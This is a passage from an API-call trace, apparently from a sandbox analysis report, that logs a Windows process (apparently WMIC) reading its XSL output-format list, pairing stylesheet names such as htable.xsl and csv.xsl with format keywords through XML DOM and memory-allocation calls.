attributeMap=0x24f518 | out: attributeMap=0x24f518*=0x22e78d0) returned 0x0 [0205.147] malloc (_Size=0x18) returned 0x366ec0 [0205.147] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22e78d0, name="KEYWORD", namedItem=0x24f528 | out: namedItem=0x24f528*=0x22ea280) returned 0x0 [0205.147] free (_Block=0x366ec0) [0205.147] IXMLDOMNode:get_nodeValue (in: This=0x22ea280, value=0x24f560 | out: value=0x24f560*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x4)) returned 0x0 [0205.147] malloc (_Size=0x18) returned 0x366ec0 [0205.148] malloc (_Size=0x18) returned 0x366ee0 [0205.148] malloc (_Size=0x30) returned 0x368080 [0205.148] IUnknown:Release (This=0x22ebd50) returned 0x0 [0205.148] IUnknown:Release (This=0x22e78d0) returned 0x0 [0205.148] IUnknown:Release (This=0x22ea280) returned 0x0 [0205.148] IXMLDOMNodeList:get_item (in: This=0x22e9cc0, index=1, listItem=0x24f510 | out: listItem=0x24f510*=0x22ebd50) returned 0x0 [0205.148] IXMLDOMNode:get_text (in: This=0x22ebd50, text=0x24f520 | out: text=0x24f520*="textvaluelist.xsl") returned 0x0 [0205.148] IXMLDOMNode:get_attributes (in: This=0x22ebd50, attributeMap=0x24f518 | out: attributeMap=0x24f518*=0x22e78d0) returned 0x0 [0205.148] malloc (_Size=0x18) returned 0x367110 [0205.148] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22e78d0, name="KEYWORD", namedItem=0x24f528 | out: namedItem=0x24f528*=0x22ea280) returned 0x0 [0205.148] free (_Block=0x367110) [0205.148] IXMLDOMNode:get_nodeValue (in: This=0x22ea280, value=0x24f560 | out: value=0x24f560*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x4)) returned 0x0 [0205.148] malloc (_Size=0x18) returned 0x36c560 [0205.148] malloc (_Size=0x18) returned 0x36c580 [0205.148] SysStringLen (param_1="VALUE") returned 0x5 [0205.148] SysStringLen (param_1="TABLE") returned 0x5 [0205.148] SysStringLen (param_1="TABLE") returned 0x5 [0205.148] SysStringLen (param_1="VALUE") returned 0x5 [0205.148] malloc (_Size=0x30) returned 0x3680c0 [0205.148] IUnknown:Release (This=0x22ebd50) returned 0x0 [0205.149] IUnknown:Release (This=0x22e78d0) returned 0x0 [0205.149] IUnknown:Release (This=0x22ea280) returned 0x0 [0205.149] IXMLDOMNodeList:get_item (in: This=0x22e9cc0, index=2, listItem=0x24f510 | out: listItem=0x24f510*=0x22ebd50) returned 0x0 [0205.149] IXMLDOMNode:get_text (in: This=0x22ebd50, text=0x24f520 | out: text=0x24f520*="textvaluelist.xsl") returned 0x0 [0205.149] IXMLDOMNode:get_attributes (in: This=0x22ebd50, attributeMap=0x24f518 | out: attributeMap=0x24f518*=0x22e78d0) returned 0x0 [0205.149] malloc (_Size=0x18) returned 0x36c5a0 [0205.149] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22e78d0, name="KEYWORD", namedItem=0x24f528 | out: namedItem=0x24f528*=0x22ea280) returned 0x0 [0205.149] free (_Block=0x36c5a0) [0205.149] IXMLDOMNode:get_nodeValue (in: This=0x22ea280, value=0x24f560 | out: value=0x24f560*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x4)) returned 0x0 [0205.149] malloc (_Size=0x18) returned 0x36c5a0 [0205.149] malloc (_Size=0x18) returned 0x36c5c0 [0205.149] SysStringLen (param_1="LIST") returned 0x4 [0205.149] SysStringLen (param_1="TABLE") returned 0x5 [0205.149] malloc (_Size=0x30) returned 0x368100 [0205.149] IUnknown:Release (This=0x22ebd50) returned 0x0 [0205.149] IUnknown:Release (This=0x22e78d0) returned 0x0 [0205.149] IUnknown:Release (This=0x22ea280) returned 0x0 [0205.149] IXMLDOMNodeList:get_item (in: This=0x22e9cc0, index=3, listItem=0x24f510 | out: listItem=0x24f510*=0x22ebd50) returned 0x0 [0205.149] IXMLDOMNode:get_text (in: This=0x22ebd50, text=0x24f520 | out: text=0x24f520*="rawxml.xsl") returned 0x0 [0205.149] IXMLDOMNode:get_attributes (in: This=0x22ebd50, attributeMap=0x24f518 | out: attributeMap=0x24f518*=0x22e78d0) returned 0x0 [0205.149] malloc (_Size=0x18) returned 0x36c5e0 [0205.149] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22e78d0, name="KEYWORD", namedItem=0x24f528 | out: namedItem=0x24f528*=0x22ea280) returned 0x0 [0205.150] free (_Block=0x36c5e0) [0205.150] IXMLDOMNode:get_nodeValue (in: This=0x22ea280, value=0x24f560 | out: value=0x24f560*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x4)) returned 0x0 [0205.150] malloc (_Size=0x18) returned 0x36c5e0 [0205.150] malloc (_Size=0x18) returned 0x36c600 [0205.150] SysStringLen (param_1="RAWXML") returned 0x6 [0205.150] SysStringLen (param_1="TABLE") returned 0x5 [0205.150] SysStringLen (param_1="RAWXML") returned 0x6 [0205.150] SysStringLen (param_1="LIST") returned 0x4 [0205.150] SysStringLen (param_1="LIST") returned 0x4 [0205.150] SysStringLen (param_1="RAWXML") returned 0x6 [0205.150] malloc (_Size=0x30) returned 0x368140 [0205.150] IUnknown:Release (This=0x22ebd50) returned 0x0 [0205.150] IUnknown:Release (This=0x22e78d0) returned 0x0 [0205.150] IUnknown:Release (This=0x22ea280) returned 0x0 [0205.150] IXMLDOMNodeList:get_item (in: This=0x22e9cc0, index=4, listItem=0x24f510 | out: listItem=0x24f510*=0x22ebd50) returned 0x0 [0205.150] IXMLDOMNode:get_text (in: This=0x22ebd50, text=0x24f520 | out: text=0x24f520*="htable.xsl") returned 0x0 [0205.150] IXMLDOMNode:get_attributes (in: This=0x22ebd50, attributeMap=0x24f518 | out: attributeMap=0x24f518*=0x22e78d0) returned 0x0 [0205.150] malloc (_Size=0x18) returned 0x36c620 [0205.150] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22e78d0, name="KEYWORD", namedItem=0x24f528 | out: namedItem=0x24f528*=0x22ea280) returned 0x0 [0205.150] free (_Block=0x36c620) [0205.150] IXMLDOMNode:get_nodeValue (in: This=0x22ea280, value=0x24f560 | out: value=0x24f560*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x4)) returned 0x0 [0205.150] malloc (_Size=0x18) returned 0x36c620 [0205.150] malloc (_Size=0x18) returned 0x36c640 [0205.150] SysStringLen (param_1="HTABLE") returned 0x6 [0205.150] SysStringLen (param_1="TABLE") returned 0x5 [0205.151] SysStringLen (param_1="HTABLE") returned 0x6 [0205.151] SysStringLen (param_1="LIST") returned 0x4 [0205.151] malloc (_Size=0x30) returned 0x368180 [0205.151] IUnknown:Release (This=0x22ebd50) returned 0x0 [0205.151] IUnknown:Release (This=0x22e78d0) returned 0x0 [0205.151] IUnknown:Release (This=0x22ea280) returned 0x0 [0205.151] IXMLDOMNodeList:get_item (in: This=0x22e9cc0, index=5, listItem=0x24f510 | out: listItem=0x24f510*=0x22ebd50) returned 0x0 [0205.151] IXMLDOMNode:get_text (in: This=0x22ebd50, text=0x24f520 | out: text=0x24f520*="hform.xsl") returned 0x0 [0205.151] IXMLDOMNode:get_attributes (in: This=0x22ebd50, attributeMap=0x24f518 | out: attributeMap=0x24f518*=0x22e78d0) returned 0x0 [0205.151] malloc (_Size=0x18) returned 0x36c660 [0205.151] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22e78d0, name="KEYWORD", namedItem=0x24f528 | out: namedItem=0x24f528*=0x22ea280) returned 0x0 [0205.151] free (_Block=0x36c660) [0205.151] IXMLDOMNode:get_nodeValue (in: This=0x22ea280, value=0x24f560 | out: value=0x24f560*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x4)) returned 0x0 [0205.151] malloc (_Size=0x18) returned 0x36c660 [0205.151] malloc (_Size=0x18) returned 0x36c680 [0205.151] SysStringLen (param_1="HFORM") returned 0x5 [0205.151] SysStringLen (param_1="TABLE") returned 0x5 [0205.151] SysStringLen (param_1="HFORM") returned 0x5 [0205.151] SysStringLen (param_1="LIST") returned 0x4 [0205.151] SysStringLen (param_1="HFORM") returned 0x5 [0205.151] SysStringLen (param_1="HTABLE") returned 0x6 [0205.151] malloc (_Size=0x30) returned 0x3681c0 [0205.151] IUnknown:Release (This=0x22ebd50) returned 0x0 [0205.151] IUnknown:Release (This=0x22e78d0) returned 0x0 [0205.151] IUnknown:Release (This=0x22ea280) returned 0x0 [0205.151] IXMLDOMNodeList:get_item (in: This=0x22e9cc0, index=6, listItem=0x24f510 | out: listItem=0x24f510*=0x22ebd50) returned 0x0 [0205.152] IXMLDOMNode:get_text (in: This=0x22ebd50, text=0x24f520 | out: text=0x24f520*="xml.xsl") returned 0x0 [0205.152] IXMLDOMNode:get_attributes (in: This=0x22ebd50, attributeMap=0x24f518 | out: attributeMap=0x24f518*=0x22e78d0) returned 0x0 [0205.152] malloc (_Size=0x18) returned 0x36c6a0 [0205.152] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22e78d0, name="KEYWORD", namedItem=0x24f528 | out: namedItem=0x24f528*=0x22ea280) returned 0x0 [0205.152] free (_Block=0x36c6a0) [0205.152] IXMLDOMNode:get_nodeValue (in: This=0x22ea280, value=0x24f560 | out: value=0x24f560*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x4)) returned 0x0 [0205.152] malloc (_Size=0x18) returned 0x36c6a0 [0205.152] malloc (_Size=0x18) returned 0x36c6c0 [0205.152] SysStringLen (param_1="XML") returned 0x3 [0205.152] SysStringLen (param_1="TABLE") returned 0x5 [0205.152] SysStringLen (param_1="XML") returned 0x3 [0205.152] SysStringLen (param_1="VALUE") returned 0x5 [0205.152] SysStringLen (param_1="VALUE") returned 0x5 [0205.152] SysStringLen (param_1="XML") returned 0x3 [0205.152] malloc (_Size=0x30) returned 0x368200 [0205.152] IUnknown:Release (This=0x22ebd50) returned 0x0 [0205.152] IUnknown:Release (This=0x22e78d0) returned 0x0 [0205.152] IUnknown:Release (This=0x22ea280) returned 0x0 [0205.152] IXMLDOMNodeList:get_item (in: This=0x22e9cc0, index=7, listItem=0x24f510 | out: listItem=0x24f510*=0x22ebd50) returned 0x0 [0205.152] IXMLDOMNode:get_text (in: This=0x22ebd50, text=0x24f520 | out: text=0x24f520*="mof.xsl") returned 0x0 [0205.152] IXMLDOMNode:get_attributes (in: This=0x22ebd50, attributeMap=0x24f518 | out: attributeMap=0x24f518*=0x22e78d0) returned 0x0 [0205.152] malloc (_Size=0x18) returned 0x36c6e0 [0205.152] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22e78d0, name="KEYWORD", namedItem=0x24f528 | out: namedItem=0x24f528*=0x22ea280) returned 0x0 [0205.152] free (_Block=0x36c6e0) [0205.153] IXMLDOMNode:get_nodeValue (in: This=0x22ea280, value=0x24f560 | out: value=0x24f560*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x4)) returned 0x0 [0205.153] malloc (_Size=0x18) returned 0x36c6e0 [0205.153] malloc (_Size=0x18) returned 0x36c700 [0205.153] SysStringLen (param_1="MOF") returned 0x3 [0205.153] SysStringLen (param_1="TABLE") returned 0x5 [0205.153] SysStringLen (param_1="MOF") returned 0x3 [0205.153] SysStringLen (param_1="LIST") returned 0x4 [0205.153] SysStringLen (param_1="MOF") returned 0x3 [0205.153] SysStringLen (param_1="RAWXML") returned 0x6 [0205.153] SysStringLen (param_1="LIST") returned 0x4 [0205.153] SysStringLen (param_1="MOF") returned 0x3 [0205.153] malloc (_Size=0x30) returned 0x368240 [0205.153] IUnknown:Release (This=0x22ebd50) returned 0x0 [0205.153] IUnknown:Release (This=0x22e78d0) returned 0x0 [0205.153] IUnknown:Release (This=0x22ea280) returned 0x0 [0205.153] IXMLDOMNodeList:get_item (in: This=0x22e9cc0, index=8, listItem=0x24f510 | out: listItem=0x24f510*=0x22ebd50) returned 0x0 [0205.153] IXMLDOMNode:get_text (in: This=0x22ebd50, text=0x24f520 | out: text=0x24f520*="csv.xsl") returned 0x0 [0205.153] IXMLDOMNode:get_attributes (in: This=0x22ebd50, attributeMap=0x24f518 | out: attributeMap=0x24f518*=0x22e78d0) returned 0x0 [0205.153] malloc (_Size=0x18) returned 0x36c720 [0205.153] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22e78d0, name="KEYWORD", namedItem=0x24f528 | out: namedItem=0x24f528*=0x22ea280) returned 0x0 [0205.153] free (_Block=0x36c720) [0205.153] IXMLDOMNode:get_nodeValue (in: This=0x22ea280, value=0x24f560 | out: value=0x24f560*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x4)) returned 0x0 [0205.153] malloc (_Size=0x18) returned 0x36c720 [0205.153] malloc (_Size=0x18) returned 0x36c740 [0205.153] SysStringLen (param_1="CSV") returned 0x3 [0205.154] SysStringLen (param_1="TABLE") returned 0x5 [0205.154] SysStringLen (param_1="CSV") returned 0x3 [0205.154] SysStringLen (param_1="LIST") returned 0x4 [0205.154] SysStringLen (param_1="CSV") returned 0x3 [0205.154] SysStringLen (param_1="HTABLE") returned 0x6 [0205.154] SysStringLen (param_1="CSV") returned 0x3 [0205.154] SysStringLen (param_1="HFORM") returned 0x5 [0205.154] malloc (_Size=0x30) returned 0x368280 [0205.154] IUnknown:Release (This=0x22ebd50) returned 0x0 [0205.154] IUnknown:Release (This=0x22e78d0) returned 0x0 [0205.154] IUnknown:Release (This=0x22ea280) returned 0x0 [0205.154] IXMLDOMNodeList:get_item (in: This=0x22e9cc0, index=9, listItem=0x24f510 | out: listItem=0x24f510*=0x22ebd50) returned 0x0 [0205.154] IXMLDOMNode:get_text (in: This=0x22ebd50, text=0x24f520 | out: text=0x24f520*="texttable.xsl") returned 0x0 [0205.154] IXMLDOMNode:get_attributes (in: This=0x22ebd50, attributeMap=0x24f518 | out: attributeMap=0x24f518*=0x22e78d0) returned 0x0 [0205.154] malloc (_Size=0x18) returned 0x36c760 [0205.154] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22e78d0, name="KEYWORD", namedItem=0x24f528 | out: namedItem=0x24f528*=0x22ea280) returned 0x0 [0205.154] free (_Block=0x36c760) [0205.154] IXMLDOMNode:get_nodeValue (in: This=0x22ea280, value=0x24f560 | out: value=0x24f560*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x4)) returned 0x0 [0205.154] malloc (_Size=0x18) returned 0x36c760 [0205.154] malloc (_Size=0x18) returned 0x36c780 [0205.154] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0205.154] SysStringLen (param_1="TABLE") returned 0x5 [0205.154] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0205.154] SysStringLen (param_1="VALUE") returned 0x5 [0205.154] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0205.154] SysStringLen (param_1="XML") returned 0x3 [0205.154] SysStringLen (param_1="XML") returned 0x3 [0205.154] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0205.155] malloc (_Size=0x30) returned 0x3682c0 [0205.155] IUnknown:Release (This=0x22ebd50) returned 0x0 [0205.155] IUnknown:Release (This=0x22e78d0) returned 0x0 [0205.155] IUnknown:Release (This=0x22ea280) returned 0x0 [0205.155] IXMLDOMNodeList:get_item (in: This=0x22e9cc0, index=10, listItem=0x24f510 | out: listItem=0x24f510*=0x22ebd50) returned 0x0 [0205.155] IXMLDOMNode:get_text (in: This=0x22ebd50, text=0x24f520 | out: text=0x24f520*="texttable.xsl") returned 0x0 [0205.155] IXMLDOMNode:get_attributes (in: This=0x22ebd50, attributeMap=0x24f518 | out: attributeMap=0x24f518*=0x22e78d0) returned 0x0 [0205.155] malloc (_Size=0x18) returned 0x36c7a0 [0205.155] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22e78d0, name="KEYWORD", namedItem=0x24f528 | out: namedItem=0x24f528*=0x22ea280) returned 0x0 [0205.155] free (_Block=0x36c7a0) [0205.155] IXMLDOMNode:get_nodeValue (in: This=0x22ea280, value=0x24f560 | out: value=0x24f560*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x4)) returned 0x0 [0205.155] malloc (_Size=0x18) returned 0x36c7a0 [0205.155] malloc (_Size=0x18) returned 0x36c7c0 [0205.155] SysStringLen (param_1="texttablewsys") returned 0xd [0205.155] SysStringLen (param_1="TABLE") returned 0x5 [0205.155] SysStringLen (param_1="texttablewsys") returned 0xd [0205.155] SysStringLen (param_1="XML") returned 0x3 [0205.155] SysStringLen (param_1="texttablewsys") returned 0xd [0205.155] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0205.155] SysStringLen (param_1="XML") returned 0x3 [0205.155] SysStringLen (param_1="texttablewsys") returned 0xd [0205.155] malloc (_Size=0x30) returned 0x368300 [0205.155] IUnknown:Release (This=0x22ebd50) returned 0x0 [0205.155] IUnknown:Release (This=0x22e78d0) returned 0x0 [0205.155] IUnknown:Release (This=0x22ea280) returned 0x0 [0205.155] IXMLDOMNodeList:get_item (in: This=0x22e9cc0, index=11, listItem=0x24f510 | out: listItem=0x24f510*=0x22ebd50) returned 0x0 [0205.156] IXMLDOMNode:get_text (in: This=0x22ebd50, text=0x24f520 | out: text=0x24f520*="texttable.xsl") returned 0x0 [0205.156] IXMLDOMNode:get_attributes (in: This=0x22ebd50, attributeMap=0x24f518 | out: attributeMap=0x24f518*=0x22e78d0) returned 0x0 [0205.156] malloc (_Size=0x18) returned 0x36c7e0 [0205.156] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22e78d0, name="KEYWORD", namedItem=0x24f528 | out: namedItem=0x24f528*=0x22ea280) returned 0x0 [0205.156] free (_Block=0x36c7e0) [0205.156] IXMLDOMNode:get_nodeValue (in: This=0x22ea280, value=0x24f560 | out: value=0x24f560*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x4)) returned 0x0 [0205.156] malloc (_Size=0x18) returned 0x36c7e0 [0205.156] malloc (_Size=0x18) returned 0x36c800 [0205.156] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0205.156] SysStringLen (param_1="TABLE") returned 0x5 [0205.156] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0205.156] SysStringLen (param_1="XML") returned 0x3 [0205.156] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0205.156] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0205.156] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0205.156] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0205.156] malloc (_Size=0x30) returned 0x368340 [0205.156] IUnknown:Release (This=0x22ebd50) returned 0x0 [0205.156] IUnknown:Release (This=0x22e78d0) returned 0x0 [0205.156] IUnknown:Release (This=0x22ea280) returned 0x0 [0205.156] IXMLDOMNodeList:get_item (in: This=0x22e9cc0, index=12, listItem=0x24f510 | out: listItem=0x24f510*=0x22ebd50) returned 0x0 [0205.156] IXMLDOMNode:get_text (in: This=0x22ebd50, text=0x24f520 | out: text=0x24f520*="texttable.xsl") returned 0x0 [0205.156] IXMLDOMNode:get_attributes (in: This=0x22ebd50, attributeMap=0x24f518 | out: attributeMap=0x24f518*=0x22e78d0) returned 0x0 [0205.156] malloc (_Size=0x18) returned 0x36c820 [0205.156] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22e78d0, name="KEYWORD", namedItem=0x24f528 | out: namedItem=0x24f528*=0x22ea280) returned 0x0 [0205.157] free (_Block=0x36c820) [0205.157] IXMLDOMNode:get_nodeValue (in: This=0x22ea280, value=0x24f560 | out: value=0x24f560*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x4)) returned 0x0 [0205.157] malloc (_Size=0x18) returned 0x36c820 [0205.157] malloc (_Size=0x18) returned 0x36c840 [0205.157] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0205.157] SysStringLen (param_1="TABLE") returned 0x5 [0205.157] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0205.157] SysStringLen (param_1="XML") returned 0x3 [0205.157] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0205.157] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0205.157] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0205.157] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0205.157] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0205.157] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0205.157] malloc (_Size=0x30) returned 0x368380 [0205.157] IUnknown:Release (This=0x22ebd50) returned 0x0 [0205.157] IUnknown:Release (This=0x22e78d0) returned 0x0 [0205.157] IUnknown:Release (This=0x22ea280) returned 0x0 [0205.157] IXMLDOMNodeList:get_item (in: This=0x22e9cc0, index=13, listItem=0x24f510 | out: listItem=0x24f510*=0x22ebd50) returned 0x0 [0205.157] IXMLDOMNode:get_text (in: This=0x22ebd50, text=0x24f520 | out: text=0x24f520*="texttable.xsl") returned 0x0 [0205.157] IXMLDOMNode:get_attributes (in: This=0x22ebd50, attributeMap=0x24f518 | out: attributeMap=0x24f518*=0x22e78d0) returned 0x0 [0205.157] malloc (_Size=0x18) returned 0x36c860 [0205.157] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22e78d0, name="KEYWORD", namedItem=0x24f528 | out: namedItem=0x24f528*=0x22ea280) returned 0x0 [0205.157] free (_Block=0x36c860) [0205.157] IXMLDOMNode:get_nodeValue (in: This=0x22ea280, value=0x24f560 | out: value=0x24f560*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x4)) returned 0x0 [0205.158] malloc (_Size=0x18) returned 0x36c860 [0205.158] malloc (_Size=0x18) returned 0x36c880 [0205.158] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0205.158] SysStringLen (param_1="TABLE") returned 0x5 [0205.158] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0205.158] SysStringLen (param_1="XML") returned 0x3 [0205.158] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0205.158] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0205.158] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0205.158] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0205.158] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0205.158] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0205.158] malloc (_Size=0x30) returned 0x3683c0 [0205.158] IUnknown:Release (This=0x22ebd50) returned 0x0 [0205.158] IUnknown:Release (This=0x22e78d0) returned 0x0 [0205.158] IUnknown:Release (This=0x22ea280) returned 0x0 [0205.158] IXMLDOMNodeList:get_item (in: This=0x22e9cc0, index=14, listItem=0x24f510 | out: listItem=0x24f510*=0x22ebd50) returned 0x0 [0205.158] IXMLDOMNode:get_text (in: This=0x22ebd50, text=0x24f520 | out: text=0x24f520*="texttable.xsl") returned 0x0 [0205.158] IXMLDOMNode:get_attributes (in: This=0x22ebd50, attributeMap=0x24f518 | out: attributeMap=0x24f518*=0x22e78d0) returned 0x0 [0205.158] malloc (_Size=0x18) returned 0x36c8a0 [0205.158] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22e78d0, name="KEYWORD", namedItem=0x24f528 | out: namedItem=0x24f528*=0x22ea280) returned 0x0 [0205.158] free (_Block=0x36c8a0) [0205.158] IXMLDOMNode:get_nodeValue (in: This=0x22ea280, value=0x24f560 | out: value=0x24f560*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x4)) returned 0x0 [0205.158] malloc (_Size=0x18) returned 0x36c8a0 [0205.158] malloc (_Size=0x18) returned 0x36c8c0 [0205.158] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0205.159] SysStringLen (param_1="TABLE") returned 0x5 [0205.159] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0205.159] SysStringLen (param_1="XML") returned 0x3 [0205.159] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0205.159] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0205.159] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0205.159] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0205.159] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0205.159] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0205.159] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0205.159] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0205.159] malloc (_Size=0x30) returned 0x368400 [0205.159] IUnknown:Release (This=0x22ebd50) returned 0x0 [0205.159] IUnknown:Release (This=0x22e78d0) returned 0x0 [0205.159] IUnknown:Release (This=0x22ea280) returned 0x0 [0205.159] IXMLDOMNodeList:get_item (in: This=0x22e9cc0, index=15, listItem=0x24f510 | out: listItem=0x24f510*=0x22ebd50) returned 0x0 [0205.159] IXMLDOMNode:get_text (in: This=0x22ebd50, text=0x24f520 | out: text=0x24f520*="htable.xsl") returned 0x0 [0205.159] IXMLDOMNode:get_attributes (in: This=0x22ebd50, attributeMap=0x24f518 | out: attributeMap=0x24f518*=0x22e78d0) returned 0x0 [0205.159] malloc (_Size=0x18) returned 0x36c8e0 [0205.159] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22e78d0, name="KEYWORD", namedItem=0x24f528 | out: namedItem=0x24f528*=0x22ea280) returned 0x0 [0205.159] free (_Block=0x36c8e0) [0205.159] IXMLDOMNode:get_nodeValue (in: This=0x22ea280, value=0x24f560 | out: value=0x24f560*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x4)) returned 0x0 [0205.159] malloc (_Size=0x18) returned 0x36c8e0 [0205.159] malloc (_Size=0x18) returned 0x36c900 [0205.159] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0205.159] SysStringLen (param_1="TABLE") returned 0x5 [0205.159] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0205.159] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0205.160] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0205.160] SysStringLen (param_1="XML") returned 0x3 [0205.160] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0205.160] SysStringLen (param_1="texttablewsys") returned 0xd [0205.160] SysStringLen (param_1="XML") returned 0x3 [0205.160] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0205.160] malloc (_Size=0x30) returned 0x368440 [0205.160] IUnknown:Release (This=0x22ebd50) returned 0x0 [0205.160] IUnknown:Release (This=0x22e78d0) returned 0x0 [0205.160] IUnknown:Release (This=0x22ea280) returned 0x0 [0205.160] IXMLDOMNodeList:get_item (in: This=0x22e9cc0, index=16, listItem=0x24f510 | out: listItem=0x24f510*=0x22ebd50) returned 0x0 [0205.160] IXMLDOMNode:get_text (in: This=0x22ebd50, text=0x24f520 | out: text=0x24f520*="htable.xsl") returned 0x0 [0205.160] IXMLDOMNode:get_attributes (in: This=0x22ebd50, attributeMap=0x24f518 | out: attributeMap=0x24f518*=0x22e78d0) returned 0x0 [0205.160] malloc (_Size=0x18) returned 0x36c920 [0205.160] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22e78d0, name="KEYWORD", namedItem=0x24f528 | out: namedItem=0x24f528*=0x22ea280) returned 0x0 [0205.160] free (_Block=0x36c920) [0205.160] IXMLDOMNode:get_nodeValue (in: This=0x22ea280, value=0x24f560 | out: value=0x24f560*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x4)) returned 0x0 [0205.160] malloc (_Size=0x18) returned 0x36c920 [0205.160] malloc (_Size=0x18) returned 0x36c940 [0205.160] SysStringLen (param_1="htable-sortby") returned 0xd [0205.160] SysStringLen (param_1="TABLE") returned 0x5 [0205.160] SysStringLen (param_1="htable-sortby") returned 0xd [0205.160] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0205.160] SysStringLen (param_1="htable-sortby") returned 0xd [0205.160] SysStringLen (param_1="XML") returned 0x3 [0205.160] SysStringLen (param_1="htable-sortby") returned 0xd [0205.160] SysStringLen (param_1="texttablewsys") returned 0xd [0205.160] SysStringLen (param_1="htable-sortby") returned 0xd [0205.161] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0205.161] SysStringLen (param_1="XML") returned 0x3 [0205.161] SysStringLen (param_1="htable-sortby") returned 0xd [0205.161] malloc (_Size=0x30) returned 0x368480 [0205.161] IUnknown:Release (This=0x22ebd50) returned 0x0 [0205.161] IUnknown:Release (This=0x22e78d0) returned 0x0 [0205.161] IUnknown:Release (This=0x22ea280) returned 0x0 [0205.161] IXMLDOMNodeList:get_item (in: This=0x22e9cc0, index=17, listItem=0x24f510 | out: listItem=0x24f510*=0x22ebd50) returned 0x0 [0205.161] IXMLDOMNode:get_text (in: This=0x22ebd50, text=0x24f520 | out: text=0x24f520*="mof.xsl") returned 0x0 [0205.161] IXMLDOMNode:get_attributes (in: 